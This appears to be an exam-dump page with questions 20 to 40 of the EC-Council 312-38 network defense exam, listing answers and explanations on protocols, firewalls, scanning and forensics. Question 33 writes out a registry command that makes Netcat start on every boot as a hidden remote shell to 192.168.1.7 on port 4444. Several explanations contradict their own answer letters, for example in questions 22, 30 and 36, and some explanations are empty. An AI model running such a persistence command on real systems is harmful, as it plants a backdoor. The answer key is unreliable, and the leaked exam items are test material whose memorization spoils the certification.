• Home
  • Blogs
  • 2022 Realistic Verified Free EC-COUNCIL 312-38 Exam Questions [Q20-Q40]

2022 Realistic Verified Free EC-COUNCIL 312-38 Exam Questions [Q20-Q40]

Share

2022 Realistic Verified Free EC-COUNCIL 312-38 Exam Questions 

312-38 Real Exam Questions and Answers FREE


Preparation Process

Understanding the exam topics is very critical to success in the test. Therefore, the potential candidates must download the exam blueprint to review the comprehensive details of these domains. After exploring the scope of the test, they can proceed to choose ample resources to prepare for EC-Council 312-38 with great deliberation.

 

NEW QUESTION 20
Which of the following is a free security-auditing tool for Linux?

  • A. Nessus
  • B. SATAN
  • C. SAINT
  • D. HPing

Answer: A

Explanation:
Explanation

 

NEW QUESTION 21
In an Ethernet peer-to-peer network, which of the following cables is used to connect two computers, using RJ-
45 connectors and Category-5 UTP cable?

  • A. Loopback
  • B. Crossover
  • C. Parallel
  • D. Serial

Answer: B

Explanation:
In an Ethernet peer-to-peer network, a crossover cable is used to connect two computers, using RJ-45
connectors and Category-5 UTP cable.
Answer options D and A are incorrect. Parallel and serial cables do not use RJ-45 connectors and Category-5
UTP cable. Parallel cables are used to connect printers, scanners etc., to computers, whereas serial cables
are used to connect modems, digital cameras etc., to computers.
Answer option B is incorrect. A loopback cable is used for testing equipments.

 

NEW QUESTION 22
Which of the following is a computer networking protocol used by hosts to retrieve IP address assignments and other configuration information?

  • A. DHCP
  • B. Telnet
  • C. ARP
  • D. SNMP

Answer: A

Explanation:
The Dynamic Host Configuration Protocol (DHCP) is a computer networking protocol used by hosts (DHCP clients) to retrieve IP address assignments and other configuration information. DHCP uses a client-server architecture. The client sends a broadcast request for configuration information. The DHCP server receives the request and responds with configuration information from its configuration database.
In the absence of DHCP, all hosts on a network must be manually configured individually - a time-consuming and often error-prone undertaking. DHCP is popular with ISP's because it allows a host to obtain a temporary IP address.
Answer option B is incorrect. Address Resolution Protocol (ARP) is a network maintenance protocol of the TCP/IP protocol suite. It is responsible for the resolution of IP addresses to media access control (MAC) addresses of a network interface card (NIC). The ARP cache is used to maintain a correlation between a MAC address and its corresponding IP address. ARP provides the protocol rules for making this correlation and providing address conversion in both directions. ARP is limited to physical network systems that support broadcast packets.
Answer option A is incorrect. The Simple Network Management Protocol (SNMP) allows a monitored device (for example, a router or a switch) to run an SNMP agent. This protocol is used for managing many network devices remotely.
When a monitored device runs an SNMP agent, an SNMP server can then query the SNMP agent running on the device to collect information such as utilization statistics or device configuration information. An SNMP- managed network typically consists of three components: managed devices, agents, and one or more network management systems.
Answer option D is incorrect. Telnet (Telecommunication network) is a network protocol used on the Internet or local area networks to provide a bidirectional interactive communications facility. Typically, Telnet provides access to a command-line interface on a remote host via a virtual terminal connection which consists of an 8- bit byte oriented data connection over the Transmission Control Protocol (TCP). User data is interspersed in- band with TELNET control information. Typically, the Telnet protocol is used to establish a connection to Transmission Control Protocol (TCP) port number 23.

 

NEW QUESTION 23
Which of the following is a worldwide organization that aims to establish, refine, and promote Internet security standards?

  • A. ANSI
  • B. ITU
  • C. IEEE
  • D. WASC

Answer: D

Explanation:
Web Application Security Consortium (WASC) is a worldwide organization that aims to establish, refine, and promote Internet security standards. WASC is vendor-neutral, although members may belong to corporations involved in the research, development, design, and distribution of Web security-related products.
Answer option A is incorrect. ANSI (American National Standards Institute) is the primary organization for fostering the development of technology standards in the United States. ANSI works with industry groups and is the U.S. member of the International Organization for Standardization (ISO) and the International Electro- technical Commission (IEC). Long-established computer standards from ANSI include the American Standard Code for Information Interchange (ASCII) and the Small Computer System Interface (SCSI).
Answer option D is incorrect. The International Telecommunication Union (ITU) is an organization established to standardize and regulate international radio and telecommunications. Its main tasks include standardization, allocation of the radio spectrum, and organizing interconnection arrangements between different countries to allow international phone calls. ITU sets standards for global telecom networks.
The ITU's telecommunications division (ITU-T) produces more than 200 standard recommendations each year in the converging areas of telecommunications, information technology, consumer electronics, broadcasting and multimedia communications. ITU was streamlined into the following three sectors:
ITU-D (Telecommunication Development)
ITU-R (Radio communication)
ITU-T (Telecommunication Standardization)
Answer option C is incorrect. The Institute of Electrical and Electronic Engineers (IEEE) is a society of technical professionals. It promotes the development and application of electro-technology and allied sciences. IEEE develops communications and network standards, among other activities. The organization publishes number of journals, has many local chapters, and societies in specialized areas.

 

NEW QUESTION 24
John wants to implement a firewall service that works at the session layer of the OSI model. The firewall must also have the ability to hide the private network information. Which type of firewall service is John thinking of implementing?

  • A. Packet Filtering
  • B. Application level gateway
  • C. Stateful Multilayer Inspection
  • D. Circuit level gateway

Answer: D

 

NEW QUESTION 25
Which of the following is an exterior gateway protocol that communicates using a Transmission Control Protocol (TCP) and sends the updated router table information?

  • A. IGMP
  • B. OSPF
  • C. IRDP
  • D. BGP

Answer: D

Explanation:
Border Gateway Protocol (BGP) is an exterior gateway protocol. It communicates using a Transmission Control Protocol (TCP) and sends the updated router table information. The best path is chosen on the basis of cost metric associated with the route. It is used between gateway hosts in a network. Answer option C is incorrect. Open Shortest Path First (OSPF) is a routing protocol that is used in large networks. Internet Engineering Task Force (IETF) designates OSPF as one of the Interior Gateway Protocols. A host uses OSPF to obtain a change in the routing table and to immediately multicast updated information to all the other hosts in the network. Answer option A is incorrect. IGMP stands for Internet Group Management Protocol. IGMP is a communication protocol that is used to manage the membership of Internet protocol multicast groups. It is an integral part of the IP multicast specification. Although it does not actually act as a transport protocol, it operates above the network layer. It is analogous to ICMP for unicast connections. It is susceptible to some attacks, so firewalls commonly allow the user to disable it if not needed. Answer option B is incorrect. ICMP Router Discovery Protocol (IRDP) uses Internet Control Message Protocol (ICMP) router advertisements and router solicitation messages to allow a host to discover the addresses of operational routers on the subnet.It basically consists of 2 message types used for discovering local routers. The message type 9 is sent periodically or on request (using a message of type 10) to the local subnet from the local routers to propagate themselves. On boot, the client may send an ICMP message of type 10 to ask for local routers. When a client receives a message type 9, they add the router to their local routing-table.

 

NEW QUESTION 26
Which of the following provide an "always on" Internet access service when connecting to an ISP? Each
correct answer represents a complete solution. (Choose two.)

  • A. Digital modem
  • B. DSL
  • C. Analog modem
  • D. Cable modem

Answer: B,D

Explanation:
DSL and Cable modems are used in remote-access WAN technology for connecting to the Internet. Both
provide an "always on" Internet access service.
Answer options C and A are incorrect. Analog and Digital modems are not always in 'ON' mode when
connecting to an ISP. Analog modems transmit analog voice signals, while Digital modems transmit digital
signals over a link.

 

NEW QUESTION 27
Which of the following statements is not true about the FAT16 file system? Each correct answer represents a complete solution. Choose all that apply.

  • A. It works well with large disk, because the cluster size increases as the disk partition size increases.
  • B. It supports the Linux operating system.
  • C. It does not support file protection.
  • D. It supports task compression files.

Answer: A,D

 

NEW QUESTION 28
FILL BLANK
Fill in the blank with the appropriate term. A ______________________ network is a local area network (LAN)
in which all computers are connected in a ring or star topology and a bit- or token-passing scheme is used for
preventing the collision of data between two computers that want to send messages at the same time.

Answer:

Explanation:
Token Ring
Explanation:
A Token Ring network is a local area network (LAN) in which all computers are connected in a ring or star
topology and a bit- or token-passing scheme is used in order to prevent the collision of data between two
computers that want to send messages at the same time. The Token Ring protocol is the second most widely-
used protocol on local area networks after Ethernet. The IBM Token Ring protocol led to a standard version,
specified as IEEE 802.5. Both protocols are used and are very similar. The IEEE 802.5 Token Ring technology
provides for data transfer rates of either 4 or 16 megabits per second.
Working:
Empty information frames are constantly circulated on the ring. When a computer has a message to send, it
adds a token to an empty frame and adds a message and a destination identifier to the frame. The frame is
then observed by each successive workstation. If the workstation sees that it is the destination for the
message, it copies the message from the frame and modifies the token back to 0. When the frame gets back
to the originator, it sees that the token has been modified to 0 and that the message has been copied and
received. It removes the message from the particular frame. The frame continues to circulate as an empty
frame, ready to be taken by a workstation when it has a message to send.

 

NEW QUESTION 29
Which of the following refers to the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system?

  • A. Phishing
  • B. Smurf
  • C. Spoofing
  • D. Session hijacking

Answer: D

Explanation:
Session hijacking refers to the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to Web developers, as the HTTP cookies used to maintain a session on many Web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft).
TCP session hijacking is when a hacker takes over a TCP session between two machines. Since most authentication only occurs at the start of a TCP session, this allows the hacker to gain access to a machine.
Answer option A is incorrect. Spoofing is a technique that makes a transmission appear to have come from an authentic source by forging the IP address, email address, caller ID, etc. In IP spoofing, a hacker modifies packet headers by using someone else's IP address to hide his identity. However, spoofing cannot be used while surfing the Internet, chatting on-line, etc. because forging the source IP address causes the responses to be misdirected.
Answer option B is incorrect. Smurf is an attack that generates significant computer network traffic on a victim network. This is a type of denial-of-service attack that floods a target system via spoofed broadcast ping messages. In such attacks, a perpetrator sends a large amount of ICMP echo request (ping) traffic to IP broadcast addresses, all of which have a spoofed source IP address of the intended victim. If the routing device delivering traffic to those broadcast addresses delivers the IP broadcast to all hosts, most hosts on that IP network will take the ICMP echo request and reply to it with an echo reply, which multiplies the traffic by the number of hosts responding.
Answer option D is incorrect. Phishing is a type of scam that entices a user to disclose personal information such as social security number, bank account details, or credit card number. An example of phishing attack is a fraudulent e-mail that appears to come from a user's bank asking to change his online banking password.
When the user clicks the link available on the e-mail, it directs him to a phishing site which replicates the original bank site. The phishing site lures the user to provide his personal information.

 

NEW QUESTION 30
Which of the following types of transmission is the process of sending one bit at a time over a single transmission line?

  • A. Multicast transmission
  • B. Parallel data transmission
  • C. Unicast transmission
  • D. Serial data transmission

Answer: D

Explanation:
In serial data transmission, one bit is sent after another (bit-serial) on a single transmission line. It is the simplest method of transmitting digital information from one point to another. This transmission is suitable for providing communication between two participants as well as for multiple participants. It is used for all long- haul communication and provides high data rates. It is also inexpensive and beneficial in transferring data over long distances.
Answer option D is incorrect. In parallel data transmission, several data signals are sent simultaneously over several parallel channels. Parallel data transmission is faster than serial data transmission. It is used primarily for transferring data between devices at the same site. For instance, communication between a computer and printer is most often parallel, allowing the entire byte to be transferred in one operation.
Answer option A is incorrect. The unicast transmission method is used to establish communication between a single host and a single receiver. Packets sent to a unicast address are delivered to the interface recognized by that IP address, as shown in the following figure:

Answer option C is incorrect. The multicast transmission method is used to establish communication between a single host and multiple receivers. Packets are sent to all interfaces recognized by that IP address, as shown in the figure below:

 

NEW QUESTION 31
Which of the following IEEE standards is an example of a DQDB access method?

  • A. 802.3
  • B. 802.5
  • C. 802.6
  • D. 802.4

Answer: C

 

NEW QUESTION 32
Which of the following plans is documented and organized for emergency response, backup operations, and
recovery maintained by an activity as part of its security program that will ensure the availability of critical
resources and facilitates the continuity of operations in an emergency situation?

  • A. Disaster Recovery Plan
  • B. Business Continuity Plan
  • C. Continuity Of Operations Plan
  • D. Contingency Plan

Answer: D

Explanation:
Contingency plan is prepared and documented for emergency response, backup operations, and recovery
maintained by an activity as the element of its security program that will ensure the availability of critical
resources and facilitates the continuity of operations in an emergency situation.
A contingency plan is a plan devised for a specific situation when things could go wrong. Contingency plans are
often devised by governments or businesses who want to be prepared for anything that could happen.
Contingency plans include specific strategies and actions to deal with
specific variances to assumptions resulting in a particular problem, emergency, or state of affairs. They also
include a monitoring process and "triggers" for initiating planned actions. They are required to help
governments, businesses, or individuals to recover from serious incidents in
the minimum time with minimum cost and disruption.
Answer option B is incorrect. A disaster recovery plan should contain data, hardware, and software that can be
critical for a business. It should also include the plan for sudden loss such as hard disc crash. The business
should use backup and data recovery utilities to limit the loss of data.
Answer option D is incorrect. The Continuity Of Operation Plan (COOP) refers to the preparations and
institutions maintained by the United States government, providing survival of federal government operations in
the case of catastrophic events. It provides procedures and capabilities to sustain an organization's essential.
COOP is the procedure documented to ensure persistent critical operations throughout any period where
normal operations are unattainable.
Answer option C is incorrect. Business Continuity Planning (BCP) is the creation and validation of a practiced
logistical plan for how an organization will recover and restore partially or completely interrupted critical (urgent)
functions within a predetermined time after a disaster or extended disruption. The logistical plan is called a
business continuity plan.

 

NEW QUESTION 33
You run the following command on the remote Windows server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e
cmd.exe"
What task do you want to perform by running this command?Each correct answer represents a complete solution. Choose all that apply.

  • A. You want to put Netcat in the stealth mode.
  • B. You want to perform banner grabbing.
  • C. You want to add the Netcat command to the Windows registry.
  • D. You want to set the Netcat to execute command any time.

Answer: A,C,D

Explanation:
According to the question, you run the following command on the remote Windows server 2003
computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d
"c:\windows\nc.exe -d 192.168.1.7 4444 -e
cmd.exe"
By running this command, you want to perform the following tasks:
Adding the NetCat command in the following registry value:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Putting the Netcat in the stealth mode by using the -d switch. Setting the Netcat tool to execute
command at any time by using the -e switch.
Answer option A is incorrect. You can perform banner grabbing by simply running the nc <host>
<port>.

 

NEW QUESTION 34
A VPN Concentrator acts as a bidirectional tunnel endpoint among host machines. What are the other f unction(s) of the device? (Select all that apply)

  • A. Manages security keys
  • B. Enables input/output (I/O) operations
  • C. Provides access memory, achieving high efficiency
  • D. Assigns user addresses

Answer: A,B,D

 

NEW QUESTION 35
You work as a professional Computer Hacking Forensic Investigator for DataEnet Inc. You want to investigate e-mail information of an employee of the company. The suspected employee is using an online e-mail system such as Hotmail or Yahoo. Which of the following folders on the local computer will you review to accomplish the task? Each correct answer represents a complete solution. Choose all that apply.

  • A. Download folder
  • B. Temporary Internet Folder
  • C. History folder
  • D. Cookies folder

Answer: B,C,D

Explanation:
Online e-mail systems such as Hotmail and Yahoo leave files containing e-mail message information on the local computer. These files are stored in a number of folders, which are as follows: Cookies folder Temp folder History folder Cache folder Temporary Internet Folder Forensic tools can recover these folders for the respective e-mail clients. When folders are retrieved, e-mail files can be accessed. If the data is not readable, various tools are available to decrypt the information such as a cookie reader used with cookies. Answer option D is incorrect. Download folder does not contain any e-mail message information.

 

NEW QUESTION 36
Which of the following tools is a free laptop tracker that helps in tracking a user's laptop in case it gets stolen?

  • A. Nessus
  • B. Snort
  • C. SAINT
  • D. Adeona

Answer: D

Explanation:
Adeona is a free laptop tracker that helps in tracking a user's laptop in case it gets stolen. All it takes is to install the Adeona software client on the user's laptop, pick a password, and make it run in the background. If at one point, the user's laptop gets stolen and is connected to the Internet, the Adeona software sends the criminal's IP address. Using the Adeona Recovery, the IP address can then be retrieved. Knowing the IP address helps in tracking the geographical location of the stolen device. Answer option D is incorrect. Nessus is proprietary comprehensive vulnerability scanning software. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on tested systems. It is capable of checking various types of vulnerabilities, some of which are as follows:Vulnerabilities that allow a remote cracker to control or access sensitive data on a system Misconfiguration (e.g. open mail relay, missing patches, etc)Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.Denials of service against the TCP/IP stack by using mangled packets Answer option A is incorrect. SAINT stands for System Administrator's Integrated Network Tool. It is computer software used for scanning computer networks for security vulnerabilities, and exploiting found vulnerabilities. The SAINT scanner screens every live system on a network for TCP and UDP services. For each service it finds running, it launches a set of probes designed to detect anything that could allow an attacker to gain unauthorized access, create a denial-ofservice, or gain sensitive information about the network. Answer option C is incorrect. Snort is an open source network intrusion detection system. The Snort application analyzes network traffic in realtime mode. It performs packet sniffing, packet logging, protocol analysis, and a content search to detect a variety of potential attacks.

 

NEW QUESTION 37
Which of the following steps of the OPSEC process examines each aspect of the planned operation to identify OPSEC indicators that could reveal critical information and then compare those indicators with the adversary's intelligence collection capabilities identified in the previous action?

  • A. Application of Appropriate OPSEC Measures
  • B. Identification of Critical Information
  • C. Assessment of Risk
  • D. Analysis of Threats
  • E. Analysis of Vulnerabilities

Answer: E

Explanation:
OPSEC is a 5-step process that helps in developing protection mechanisms in order to safeguard sensitive information and preserve essential secrecy. The OPSEC process has five steps, which are as follows:
1.Identification of Critical Information: This step includes identifying information vitally needed by an adversary, which focuses the remainder of the OPSEC process on protecting vital information, rather than attempting to protect all classified or sensitive unclassified information.
2.Analysis of Threats: This step includes the research and analysis of intelligence, counter-intelligence, and open source information to identify likely adversaries to a planned operation.
3.Analysis of Vulnerabilities: It includes examining each aspect of the planned operation to identify OPSEC indicators that could reveal critical information and then comparing those indicators with the adversary's intelligence collection capabilities identified in the previous action. 4.Assessment of Risk: Firstly, planners analyze the vulnerabilities identified in the previous action and identify possible OPSEC measures for each vulnerability. Secondly, specific OPSEC measures are selected for execution based upon a risk assessment done by the commander and staff.
5.Application of Appropriate OPSEC Measures: The command implements the OPSEC measures selected in the assessment of risk action or, in the case of planned future operations and activities, includes the measures in specific OPSEC plans.

 

NEW QUESTION 38
Which of the following steps are required in an idle scan of a closed port?
Each correct answer represents a part of the solution. Choose all that apply.

  • A. The zombie's IP ID increases by only 1.
  • B. The attacker sends a SYN/ACK to the zombie.
  • C. The zombie ignores the unsolicited RST, and the IP ID remains unchanged.
  • D. In response to the SYN, the target sends a RST.
  • E. The zombie's IP ID increases by 2.

Answer: A,B,C,D

Explanation:
Following are the steps required in an idle scan of a closed port:
1.Probe the zombie's IP ID: The attacker sends a SYN/ACK to the zombie. The zombie, unaware of the SYN/
ACK, sends back a RST, thus disclosing its IP ID.

2.Forge a SYN packet from the zombie: In response to the SYN, the target sends a RST. The zombie ignores
the unsolicited RST, and the IP ID remains unchanged.

3.Probe the zombie's IP ID again: The zombie's IP ID has increased by only 1 since step 1. So the port is
closed.

 

NEW QUESTION 39
Which of the following layers refers to the higher-level protocols used by most applications for network communication?

  • A. Transport layer
  • B. Application layer
  • C. Internet layer
  • D. Link layer

Answer: B

 

NEW QUESTION 40
......

Exam Dumps 312-38 Practice Free Latest EC-COUNCIL Practice Tests: https://www.examprepaway.com/EC-COUNCIL/braindumps.312-38.ete.file.html

312-38 Exam Questions | Real 312-38 Practice Dumps: https://drive.google.com/open?id=1qkrENH41jeummwoiF1K77cl52u1Me3eC 

Related Blogs

more
EC-COUNCIL 312-38 Certification Practice Exam